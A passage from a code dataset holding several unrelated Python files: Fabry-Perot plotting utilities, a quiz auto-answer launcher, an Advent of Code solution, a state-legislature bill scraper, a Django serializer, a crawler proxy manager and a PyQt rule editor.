np.histogram(data, density=True, bins=bins)\n else:\n hist, bins = np.histogram(data, density=True, bins='auto')\n\n hist *= 100.0\n\n bw = bins[1] - bins[0]\n\n if horizontal:\n ax.barh(bins[0:-1], hist * bw, height=bw)#, color='dimgray') # , alpha=0.5)\n if data.max() > 1000:\n ax.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))\n else:\n ax.get_yaxis().get_major_formatter().set_scientific(True)\n ax.get_yaxis().get_major_formatter().set_useOffset(False)\n else:\n ax.bar(bins[0:-1], hist * bw, width=bw)#, color='dimgray') # , alpha=0.5)\n if data.max() > 1000:\n # I don't think this works\n # ax.get_xaxis().get_major_formatter().set_scientific(True)\n ax.ticklabel_format(style='sci', axis='x', scilimits=(0, 0))\n else:\n ax.get_xaxis().get_major_formatter().set_scientific(True)\n\n ax.get_xaxis().get_major_formatter().set_useOffset(False)\n return bins\n\n\ndef my_hist2d(ax, data1, data2, bins=None, z=30):\n \"\"\"Custom 2d histogram option for plotting correlations\n\n Args:\n ax (matplotlib.axes.Axes): axes to plot with\n data1 (np.ndarray): array of values to histogram\n data2 (np.ndarray): other array of values\n bins (int, optional): number of bins in histogram\n z (int): number of filled contours\n\n Returns:\n matplotlib.colorbar.Colorbar: colorbar from the 2d histogram\n \"\"\"\n if bins is not None:\n hist, xx, yy = np.histogram2d(data1, data2, density=True, bins=bins)\n else:\n hist, xx, yy = np.histogram2d(data1, data2, density=True)\n\n dx = xx[1] - xx[0]\n dy = yy[1] - yy[0]\n\n im = ax.contourf(yy[0:-1], xx[0:-1], hist * dx * dy, z)\n # ax_divider = make_axes_locatable(ax)\n # cax = ax_divider.append_axes(\"right\", size=\"7%\", pad=\"2%\")\n cb = plt.colorbar(im, ax=ax)\n\n if data1.max() > 1000:\n # ax.get_yaxis().get_major_formatter().set_scientific(True)\n ax.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))\n else:\n ax.get_yaxis().get_major_formatter().set_scientific(False)\n if data2.max() > 1000:\n ax.ticklabel_format(style='sci', axis='x', scilimits=(0, 0))\n # ax.get_xaxis().get_major_formatter().set_scientific(True)\n else:\n ax.get_xaxis().get_major_formatter().set_scientific(False)\n\n ax.get_xaxis().get_major_formatter().set_useOffset(False)\n ax.get_yaxis().get_major_formatter().set_useOffset(False)\n return cb\n\n\nclass ClickBuilder:\n \"\"\"Little class for interactive plot features\n\n Attributes:\n x (list): x values from clicking\n y (list): y values from clicking\n fig (matplotlib.figure.Figure): matplotlib figure to get clicks from\n cid (int): id for the matplotlib 
callback\n    \"\"\"\n\n    def __init__(self, fig):\n        self.x = []\n        self.y = []\n        self.fig = fig\n        self.cid = fig.canvas.mpl_connect('button_press_event', self.onclick)\n\n    def onclick(self, event):\n        \"\"\"Callback function for registering matplotlib clicks. X and Y values are stored in self.x and self.y\n        \n        Args:\n            event (matplotlib.backend_bases.LocationEvent): matplotlib location event\n        \"\"\"\n        self.x.append(event.xdata)\n        self.y.append(event.ydata)\n\n\ndef center_plot(data, x0=None, y0=None):\n    \"\"\"Runs clickable center plot for an image\n\n    Args:\n        data (np.ndarray): pixel values for image\n        x0 (float, default=None): x center for zoomed image, if\n            none will use the center of data array\n        y0 (float, default=None): y center for zoomed image, if\n            none will use the center of data array\n    Returns:\n        Tuple (float, float): x value of click guess, y value of click guess\n    \"\"\"\n    if x0 is None:\n        x0 = data.shape[1] / 2.\n    if y0 is None:\n        y0 = data.shape[0] / 2.\n    dx = int(0.3 * x0)\n    dy = int(0.3 * y0)\n\n    fig, axs = plt.subplots(1, 2, figsize=(12, 6))\n    cb = axs[0].imshow(data, cmap='gray', origin='lower')\n    axs[0].add_patch(Rectangle((x0 - dx, y0 - dy), 2 * dx, 2 * dy, lw=2, linestyle='--', ec='red', fc='none'))\n    divider = make_axes_locatable(axs[0])\n    cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n    fig.colorbar(cb, cax=cax)\n    axs[1].imshow(data, cmap='gray', origin='lower')\n    axs[1].set_title('Click for center guess')\n    plt.setp(axs[1].spines.values(), color='red')\n    [i.set_linewidth(5) for i in axs[1].spines.itervalues()]\n    [i.set_linestyle('--') for i in axs[1].spines.itervalues()]\n    axs[1].set_ylim(y0 - dy, y0 + dy)\n    axs[1].set_xlim(x0 - dx, x0 + dx)\n\n    center_guess = ClickBuilder(fig)\n    plt.tight_layout()\n    plt.show()\n    fig.canvas.mpl_disconnect(center_guess.cid)\n    return center_guess.x[0], center_guess.y[0]\n\n\ndef ringsum_click(r, sig, title='Click Me!'):\n    \"\"\"Runs clickable ringsum plot\n\n    Args:\n        r (np.ndarray): bin values\n        sig (np.ndarray): ringsum values\n        title (str): instructions for clicker displayed as plot title\n\n    Returns:\n        Tuple (list, list): x value(s) of click(s), y value(s) of click(s)\n    \"\"\"\n    fig, axs = plt.subplots(figsize=(10, 6))\n    axs.plot(r, sig, lw=2)\n    axs.set_title(title, fontsize=22)\n    axs.set_xlabel('R (pixels)', fontsize=18)\n    axs.set_ylabel('Counts', fontsize=18)\n    clicks = ClickBuilder(fig)\n    plt.show()\n    fig.canvas.mpl_disconnect(clicks.cid)\n    return clicks.x, clicks.y\n\n\ndef peak_plot(r, sig, peaks, peaks_sd, orders, fax=None, anspks=None, anspks_sd=None):\n    \"\"\"Plots ringsum data with labeled peaks and orders\n\n    Args:\n        r (np.ndarray): r array from ringsum\n        sig (np.ndarray): ringsum signal\n        peaks (dict): dictionary of peak locations\n            the keys are the wavelengths\n        peaks_sd (dict): dictionary of peak errors\n        orders (dict): dictionary of peak orders\n            the keys are the wavelengths\n        fax (tuple, default=None): the figure and axis\n            handles for the plot, if adding to existing\n            plot. Default is None, which will make a\n            new set of figure and axes and run plt.show()\n        anspks (dict): dictionary with peak answers from multinest\n        anspks_sd (dict): dictionary with peak sd answers from multinest\n    \"\"\"\n    if fax is None:\n        fig, ax = plt.subplots(figsize=(10, 6))\n    else:\n        fig, ax = fax\n\n    colors = tableau20_colors()\n    ax.plot(r ** 2, sig, 'o-', color=colors[0], lw=2)\n    i = 1\n    for key in peaks.keys():\n        for j, pk in enumerate(peaks[key]):\n            pk_sd = 2.
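For reference, a stand-alone version of the click-capture pattern that ClickBuilder implements: connect a callback to 'button_press_event', collect event.xdata/event.ydata, and disconnect when done. This only does something useful with an interactive matplotlib backend; the plotted line is a placeholder.

import matplotlib.pyplot as plt

clicks = []

def on_click(event):
    # xdata/ydata are None when the click lands outside the axes
    if event.xdata is not None:
        clicks.append((event.xdata, event.ydata))

fig, ax = plt.subplots()
ax.plot([0, 1], [0, 1])
cid = fig.canvas.mpl_connect('button_press_event', on_click)
plt.show()                          # click a few times, then close the window
fig.canvas.mpl_disconnect(cid)
print(clicks)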
* pk * peaks_sd[key][j] / 2.0 # binwidth / 2.0\n ax.axvspan(pk ** 2 - pk_sd, pk ** 2 + pk_sd, color=colors[i],\n label='{0}: j={1}'.format(key, orders[key][j]), alpha=0.7)\n i += 1\n if i > len(colors):\n i = 0\n if anspks is not None:\n anspk = anspks[key][j]\n anspk_sd = 2. * anspk * anspks_sd[key][j]\n ax.axvspan(anspk ** 2 - anspk_sd, anspk ** 2 + anspk_sd, color=colors[i],\n label='{0}: j={1} multinest'.format(key, orders[key][j]), alpha=0.7)\n i += 1\n if i > len(colors):\n i = 0\n ax.legend(fontsize=14)\n ax.set_xlabel(r'R$^{2}$', fontsize=18)\n ax.set_ylabel('Counts', fontsize=18)\n\n if fax is None:\n plt.show()\n else:\n return\n\n\ndef ring_plot(data, fax=None, block=True):\n \"\"\"Plots the Fabry Perot ring image\n \n Args:\n data (np.ndarray): 2D image data\n fax (tuple, optional): figure and axis\n block (bool): True if you want plt.show(block=True)\n \"\"\"\n if fax is None:\n fig, ax = plt.subplots(figsize=(10, 8))\n else:\n fig, ax = fax\n\n cb = ax.imshow(data, cmap='Greys_r', origin='lower', interpolation=None)\n #cb = ax.imshow(data, cmap='Greys_r', interpolation=None)\n divider = make_axes_locatable(ax)\n cax = divider.append_axes('right', size='5%', pad=0.05)\n fig.colorbar(cb, cax=cax, extend='max')\n if fax is not None:\n return\n else:\n plt.show(block=block)\n", "repo_name": "jmilhone/fabry_perot", "sub_path": "fabry/tools/plotting.py", "file_name": "plotting.py", "file_ext": "py", "file_size_in_byte": 9554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.histogram", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.histogram2d", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.histogram2d", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 156, "usage_type": "call"}, {"api_name": "mpl_toolkits.axes_grid1.make_axes_locatable", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 244, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 244, "usage_type": "name"}, {"api_name": 
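The colorbar layout idiom that ring_plot uses deserves a compact sketch: make_axes_locatable carves a slim axes off the right edge of the image axes, so the colorbar always matches the image height. The random image below is a placeholder.

import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable

fig, ax = plt.subplots()
im = ax.imshow(np.random.rand(50, 50), cmap='Greys_r', origin='lower')
divider = make_axes_locatable(ax)
cax = divider.append_axes('right', size='5%', pad=0.05)  # 5% of the axes width
fig.colorbar(im, cax=cax)
plt.show()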
"matplotlib.pyplot.subplots", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "mpl_toolkits.axes_grid1.make_axes_locatable", "line_number": 264, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 270, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 270, "usage_type": "name"}]} +{"seq_id": "20202794668", "text": "# -*- coding: utf-8 -*-\nimport logging\n\nfrom autoanswer.answerBwyx import AnswerBwyx\nfrom autoanswer.answerCddh import AnswerCddh\nfrom autoanswer.answerQdt import AnswerQdt\nfrom autoanswer.answerTnwz import AnswerTnwz\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S')\n\nif __name__ == '__main__':\n applicationNum = input(\"please select application(0:头脑王者,1:趣答题,2:冲顶大会,3:百万英雄,default:头脑王者):\")\n if applicationNum == '0':\n # 头脑王者\n AnswerTnwz().run()\n elif applicationNum == '1':\n # 趣答题\n AnswerQdt().run()\n elif applicationNum == '2':\n # 冲顶大会\n AnswerCddh().run()\n elif applicationNum == '3':\n # 百万英雄\n AnswerBwyx().run()\n else:\n # 默认头脑王者\n AnswerTnwz().run()\n", "repo_name": "Alan3058/python-study", "sub_path": "src/autoanswer/answerAuto.py", "file_name": "answerAuto.py", "file_ext": "py", "file_size_in_byte": 970, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 9, "usage_type": "attribute"}, {"api_name": "autoanswer.answerTnwz.AnswerTnwz", "line_number": 17, "usage_type": "call"}, {"api_name": "autoanswer.answerQdt.AnswerQdt", "line_number": 20, "usage_type": "call"}, {"api_name": "autoanswer.answerCddh.AnswerCddh", "line_number": 23, "usage_type": "call"}, {"api_name": "autoanswer.answerBwyx.AnswerBwyx", "line_number": 26, "usage_type": "call"}, {"api_name": "autoanswer.answerTnwz.AnswerTnwz", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "17336879364", "text": "import logging\r\n\r\n\r\ndef read_input(text_file_name):\r\n logging.info(\"In: read_input()\")\r\n lines = None\r\n\r\n with open(text_file_name) as f:\r\n lines = f.read()\r\n\r\n split_lines = lines.splitlines()\r\n \r\n logging.info(\"Out: read_input()\")\r\n return split_lines\r\n\r\n\r\nif __name__ == \"__main__\":\r\n result = read_input('sample.txt')\r\n\r\n total = 0\r\n\r\n scoring_table = {\r\n 'A X': 3,\r\n 'B X': 1,\r\n 'C X': 2,\r\n 'A Y': 4,\r\n 'B Y': 5,\r\n 'C Y': 6, \r\n 'A Z': 8,\r\n 'B Z': 9,\r\n 'C Z': 7 \r\n }\r\n\r\n for i in result:\r\n total += scoring_table[i]\r\n \r\n print(f'Total Score: { total }')", "repo_name": "raymond-gines/AdventOfCode2022", "sub_path": "src/day-2/src.py", "file_name": "src.py", "file_ext": "py", "file_size_in_byte": 680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.info", "line_number": 5, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "29838035727", "text": "import re\nimport datetime\n\nfrom fiftystates.scrape import NoDataForPeriod\nfrom fiftystates.scrape.bills import BillScraper, Bill\nfrom fiftystates.scrape.votes import Vote\nfrom fiftystates.scrape.pa import metadata\nfrom fiftystates.scrape.pa.utils import (bill_abbr, start_year,\n parse_action_date,\n 
bill_list_url, history_url, info_url,\n                                         vote_url)\n\nimport lxml.html\n\n\ndef action_type(action):\n    return 'other'\n\n\nclass PABillScraper(BillScraper):\n    state = 'pa'\n\n    def scrape(self, chamber, year):\n        term = None\n        for t in metadata['terms']:\n            if t['name'] == \"%s-%d\" % (year, int(year) + 1):\n                term = t\n                break\n        else:\n            raise NoDataForPeriod(year)\n\n        for session in term['sessions']:\n            match = re.search(\"#(\\d+)\", session)\n            if match:\n                self.scrape_session(chamber, session, int(match.group(1)))\n            else:\n                self.scrape_session(chamber, session)\n\n    def scrape_session(self, chamber, session, special=0):\n        url = bill_list_url(chamber, session, special)\n\n        with self.urlopen(url) as page:\n            page = lxml.html.fromstring(page)\n            page.make_links_absolute(url)\n\n            for link in page.xpath('//a[contains(@href, \"billinfo\")]'):\n                self.parse_bill(chamber, session, special, link)\n\n    def parse_bill(self, chamber, session, special, link):\n        bill_num = link.text.strip()\n        bill_type = re.search('type=(B|R|)', link.attrib['href']).group(1)\n        bill_id = \"%s%s %s\" % (bill_abbr(chamber), bill_type, bill_num)\n\n        url = info_url(chamber, session, special, bill_type, bill_num)\n        with self.urlopen(url) as page:\n            page = lxml.html.fromstring(page)\n            page.make_links_absolute(url)\n\n            title = page.xpath(\n                \"//td[text() = 'Short Title:']/following-sibling::td\")[0]\n            title = title.text.strip()\n\n            bill = Bill(session, chamber, bill_id, title)\n            bill.add_source(url)\n\n            self.parse_bill_versions(bill, page)\n\n            self.parse_history(bill, history_url(chamber, session, special,\n                                                 bill_type, bill_num))\n\n            self.parse_votes(bill, vote_url(chamber, session, special,\n                                            bill_type, bill_num))\n\n            self.save_bill(bill)\n\n    def parse_bill_versions(self, bill, page):\n        for link in page.xpath(\n            '//div[@class=\"pn_table\"]/descendant::a[@class=\"link2\"]'):\n\n            bill.add_version(\"Printer's No.
%s\" % link.text.strip(),\n link.attrib['href'])\n\n def parse_history(self, bill, url):\n bill.add_source(url)\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n page.make_links_absolute(url)\n self.parse_sponsors(bill, page)\n self.parse_actions(bill, page)\n\n def parse_sponsors(self, bill, page):\n first = True\n for link in page.xpath(\n \"//td[text() = 'Sponsors:']/../descendant::a\"):\n\n if first:\n sponsor_type = 'primary'\n first = False\n else:\n sponsor_type = 'cosponsor'\n\n bill.add_sponsor(sponsor_type, link.text.strip())\n\n def parse_actions(self, bill, page):\n chamber = bill['chamber']\n\n for tr in page.xpath(\"//td[text() = 'Actions:']/\"\n \"following-sibling::td/table/tr\"):\n action = tr.xpath(\"string()\").replace(u'\\xa0', ' ').strip()\n\n if action == 'In the House':\n chamber = 'lower'\n continue\n elif action == 'In the Senate':\n chamber = 'upper'\n continue\n\n match = re.match(\n r\"(.*),\\s+(\\w+\\.?\\s+\\d{1,2},\\s+\\d{4})( \\(\\d+-\\d+\\))?\", action)\n\n if not match:\n continue\n\n action = match.group(1)\n date = parse_action_date(match.group(2))\n bill.add_action(chamber, action, date, type=action_type(action))\n\n def parse_votes(self, bill, url):\n bill.add_source(url)\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n page.make_links_absolute(url)\n\n for td in page.xpath(\"//td[@class = 'vote']\"):\n caption = td.xpath(\"string(preceding-sibling::td)\").strip()\n\n location = ''\n if caption == 'Senate':\n chamber = 'upper'\n elif caption == 'House':\n chamber = 'lower'\n else:\n continue\n\n self.parse_chamber_votes(chamber, bill,\n td.xpath('a')[0].attrib['href'])\n\n def parse_chamber_votes(self, chamber, bill, url):\n bill.add_source(url)\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n page.make_links_absolute(url)\n\n for link in page.xpath(\"//a[contains(@href, 'rc_view')]\"):\n vote = self.parse_roll_call(link.attrib['href'])\n # bill.add_vote(vote)\n\n def parse_roll_call(self, url):\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n\n date = page.xpath(\n \"//div[@class='font8text']\")[1].text.split(',', 1)[1].strip()\n\n # TODO: parse PA's horrible new roll-call vote pages\n return None\n", "repo_name": "runderwood/fiftystates", "sub_path": "fiftystates/scrape/pa/bills.py", "file_name": "bills.py", "file_ext": "py", "file_size_in_byte": 5680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fiftystates.scrape.bills.BillScraper", "line_number": 20, "usage_type": "name"}, {"api_name": "fiftystates.scrape.pa.metadata", "line_number": 25, "usage_type": "name"}, {"api_name": "re.search", "line_number": 33, "usage_type": "call"}, {"api_name": "fiftystates.scrape.pa.utils.bill_list_url", "line_number": 40, "usage_type": "call"}, {"api_name": "lxml.html.html.fromstring", "line_number": 43, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 43, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 43, "usage_type": "name"}, {"api_name": "re.search", "line_number": 51, "usage_type": "call"}, {"api_name": "fiftystates.scrape.pa.utils.bill_abbr", "line_number": 52, "usage_type": "call"}, {"api_name": "fiftystates.scrape.pa.utils.info_url", "line_number": 54, "usage_type": "call"}, {"api_name": "lxml.html.html.fromstring", "line_number": 56, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 56, "usage_type": "attribute"}, 
{"api_name": "lxml.html", "line_number": 56, "usage_type": "name"}, {"api_name": "fiftystates.scrape.bills.Bill", "line_number": 63, "usage_type": "call"}, {"api_name": "fiftystates.scrape.pa.utils.history_url", "line_number": 68, "usage_type": "call"}, {"api_name": "fiftystates.scrape.pa.utils.vote_url", "line_number": 71, "usage_type": "call"}, {"api_name": "lxml.html.html.fromstring", "line_number": 86, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 86, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 86, "usage_type": "name"}, {"api_name": "re.match", "line_number": 118, "usage_type": "call"}, {"api_name": "fiftystates.scrape.pa.utils.parse_action_date", "line_number": 125, "usage_type": "call"}, {"api_name": "lxml.html.html.fromstring", "line_number": 131, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 131, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 131, "usage_type": "name"}, {"api_name": "lxml.html.html.fromstring", "line_number": 151, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 151, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 151, "usage_type": "name"}, {"api_name": "lxml.html.html.fromstring", "line_number": 160, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 160, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 160, "usage_type": "name"}]} +{"seq_id": "44518724117", "text": "from rest_framework import serializers\nfrom polls.models import Question\n\nclass QuestionSerializer (serializers.Serializer):\n pk = serializers.Field()\n question_text = serializers.CharField(required=True, max_length=200)\n pub_date = serializers.DateTimeField(required=True)\n \n\n \"\"\" Define function to handle create or update \"\"\"\n def restore_object(self, attrs, instance=None):\n if instance:\n instance.question_text = attrs.get('question_text', instance.question_text)\n instance.pub_date = attrs.get('pub_date', instance.pub_date)\n return instance\n\n return Question(**attrs)\n\n\n\nclass QuestionModelSerializer(serializers.ModelSerializer):\n class Meta:\n model = Question\n fields = ('question_text', 'pub_date')\n\n", "repo_name": "shaycohen/django_train", "sub_path": "mysite.REST/polls/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 792, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.serializers.Serializer", "line_number": 4, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 4, "usage_type": "name"}, {"api_name": "rest_framework.serializers.Field", "line_number": 5, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 5, "usage_type": "name"}, {"api_name": "rest_framework.serializers.CharField", "line_number": 6, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 6, "usage_type": "name"}, {"api_name": "rest_framework.serializers.DateTimeField", "line_number": 7, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 7, "usage_type": "name"}, {"api_name": "polls.models.Question", "line_number": 17, "usage_type": "call"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 21, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 21, "usage_type": "name"}, {"api_name": "polls.models.Question", "line_number": 
23, "usage_type": "name"}]} +{"seq_id": "72335408514", "text": "# coding:utf-8\nfrom SqlDBHelper import ProxyItem, RequestResponseMap\nimport itertools, logging, time\nfrom Handlers import SqlItemHandler, RandomWaitRequestHandler\nfrom Spiders import ProxySpider\nimport GlobalMethod as M\n\nclass ProxyManager(object):\n\tREQUEST_COUNT_THRESHOLD = ProxyItem.DEFAULT_SCORE\n\n\tdef __init__(self, tag=''):\n\t\tself._proxy = None\n\t\tself._proxy_score = None\n\t\tself._cur_proxy_request_count = 0\n\t\tself.session = M.create_engine('proxy' + tag, ProxyItem)\n\n\tdef destroy(self):\n\t\tif self.session:\n\t\t\tself.session.close()\n\t\t\tself.session = None\n\n\tdef crawl_new_proxies(self, proxy_dispatcher):\n\t\tlogging.info('crawl_new_proxies now')\n\t\tProxyItem.clear_all(self.session)\n\t\tproxy_dispatcher.add_item_handler(SqlItemHandler.SqlItemHandler())\n\t\tproxy_dispatcher.add_request_handler(RandomWaitRequestHandler.RandomWaitRequestHandler())\n\t\tspiders = [cls(proxy_dispatcher.get_tag()) for cls in ProxySpider.cls_list]\n\t\tproxy_dispatcher.run(*spiders)\n\n\tdef pick_proxy(self, url):\n\t\tif not self._proxy or self._cur_proxy_request_count > self.REQUEST_COUNT_THRESHOLD:\n\t\t\tself._proxy, self._proxy_score = self._choose_proxy(url)\n\t\t\tlogging.info('try using proxy {}'.format(self._proxy))\n\t\t\tself._cur_proxy_request_count = 0\n\t\treturn self._proxy\n\n\tdef feed_yes_or_no(self, b):\n\t\tif not self._proxy:\n\t\t\treturn #不会这里\n\n\t\tif b:\n\t\t\tself._cur_proxy_request_count += 1\n\t\telse:\n\t\t\tdelta_score = self._get_delta_score()\n\t\t\tself._score_proxy(self._proxy_score + delta_score)#成功多少次就打多少分.所有的一开始是100分,试验一次就知道多少分了\n\t\t\tself._proxy = None#清空\n\n\tdef _get_delta_score(self):\n\t\tif self._cur_proxy_request_count == 1:\n\t\t\treturn 0\n\t\telif self._cur_proxy_request_count > 1:\n\t\t\treturn int(self._cur_proxy_request_count / 2) #适度加分\n\t\telse:\n\t\t\treturn -1#减一分\n\n\tdef _choose_proxy(self, url):\n\t\tif url.startswith('https'):\n\t\t\thttp_type = 'HTTPS'\n\t\telse:\n\t\t\thttp_type = 'HTTP'\n\t\treturn ProxyItem.get_proper_proxy(self.session, http_type)\n\n\tdef _score_proxy(self, score):\n\t\tif self._proxy:\n\t\t\tlogging.info('scoring proxy {} score {}'.format(self._proxy, score))\n\t\t\tProxyItem.set_proxy_score(self.session, self._proxy, score)\n\n", "repo_name": "c0nnyr/MrSpider", "sub_path": "ProxyManager.py", "file_name": "ProxyManager.py", "file_ext": "py", "file_size_in_byte": 2179, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "SqlDBHelper.ProxyItem.DEFAULT_SCORE", "line_number": 9, "usage_type": "attribute"}, {"api_name": "SqlDBHelper.ProxyItem", "line_number": 9, "usage_type": "name"}, {"api_name": "GlobalMethod.create_engine", "line_number": 15, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem", "line_number": 15, "usage_type": "argument"}, {"api_name": "logging.info", "line_number": 23, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem.clear_all", "line_number": 24, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem", "line_number": 24, "usage_type": "name"}, {"api_name": "Handlers.SqlItemHandler.SqlItemHandler", "line_number": 25, "usage_type": "call"}, {"api_name": "Handlers.SqlItemHandler", "line_number": 25, "usage_type": "name"}, {"api_name": "Handlers.RandomWaitRequestHandler.RandomWaitRequestHandler", "line_number": 26, "usage_type": "call"}, {"api_name": "Handlers.RandomWaitRequestHandler", "line_number": 26, 
"usage_type": "name"}, {"api_name": "Spiders.ProxySpider.cls_list", "line_number": 27, "usage_type": "attribute"}, {"api_name": "Spiders.ProxySpider", "line_number": 27, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 33, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem.get_proper_proxy", "line_number": 61, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem", "line_number": 61, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 65, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem.set_proxy_score", "line_number": 66, "usage_type": "call"}, {"api_name": "SqlDBHelper.ProxyItem", "line_number": 66, "usage_type": "name"}]} +{"seq_id": "22290573548", "text": "from PyQt4 import QtGui, QtCore\n\nfrom editor_qt import Editor\nfrom common import Component, WidgetItemComponent, UNIVERSE_ENTITY\nfrom engine.state import RuleComponent, OP_MAP\nfrom event import Event, EVENT_MAPPING, EVENT_QUEUE, EVENT_MANAGER\n\n\nclass RuleDefinitionEditor(Editor):\n def __init__(self, context):\n super(RuleDefinitionEditor, self).__init__(context,\n QtGui.QGroupBox('Rule'))\n if 'rules' not in self.context:\n self.context['rules'] = list()\n # gui elements\n self.layout = QtGui.QGridLayout()\n self.rule_name_label = QtGui.QLabel('Rule Name')\n self.rule_name_field = QtGui.QLineEdit()\n self.operator_label = QtGui.QLabel('Choose Operator')\n self.operator_list_view = QtGui.QComboBox()\n self.operator_layout = QtGui.QVBoxLayout()\n self.value_label = QtGui.QLabel('Rule Value')\n self.value_field = QtGui.QLineEdit()\n self.rule_list_view = QtGui.QListWidget()\n self.add_rule_button = QtGui.QPushButton('Add Rule')\n self.remove_rule_button = QtGui.QPushButton('Remove Rule')\n self.rule_button_layout = QtGui.QVBoxLayout()\n\n # set up layout\n self.layout.addWidget(self.rule_name_label,0,0)\n self.layout.addWidget(self.rule_name_field,0,1)\n self.operator_layout.addWidget(self.operator_label)\n self.operator_layout.addWidget(self.operator_list_view)\n self.layout.addLayout(self.operator_layout,1,0)\n self.layout.addWidget(self.value_label,1,1)\n self.layout.addWidget(self.value_field,1,2)\n self.layout.addWidget(self.rule_list_view,2,0)\n self.rule_button_layout.addWidget(self.add_rule_button)\n self.rule_button_layout.addWidget(self.remove_rule_button)\n self.layout.addLayout(self.rule_button_layout,2,1)\n\n self.group.setLayout(self.layout)\n \n # add operators\n self.operator_list_view.addItems(OP_MAP.keys())\n\n # wire up events\n self.add_rule_button.clicked.connect(self.add_rule)\n self.remove_rule_button.clicked.connect(self.remove_rule)\n self.rule_list_view.currentItemChanged.connect(self.select_rule)\n\n def add_rule(self):\n rule_name = str(self.rule_name_field.text())\n operator = str(self.operator_list_view.itemText(self.operator_list_view.currentIndex()))\n value = str(self.value_field.text())\n try:\n value = float(value)\n except ValueError:\n pass\n # create rule component\n rule_component = RuleComponent(rule_name, operator, value)\n rule_component_wrapper = Component(rule_component, rule_name)\n widget_component = WidgetItemComponent(rule_name,\n rule_component_wrapper)\n self.rule_list_view.addItem(widget_component)\n\n # add the rule component to the application context\n self.context['rules'].append(rule_component_wrapper)\n\n # fire event for adding rule\n new_event = Event('added_rule',\n 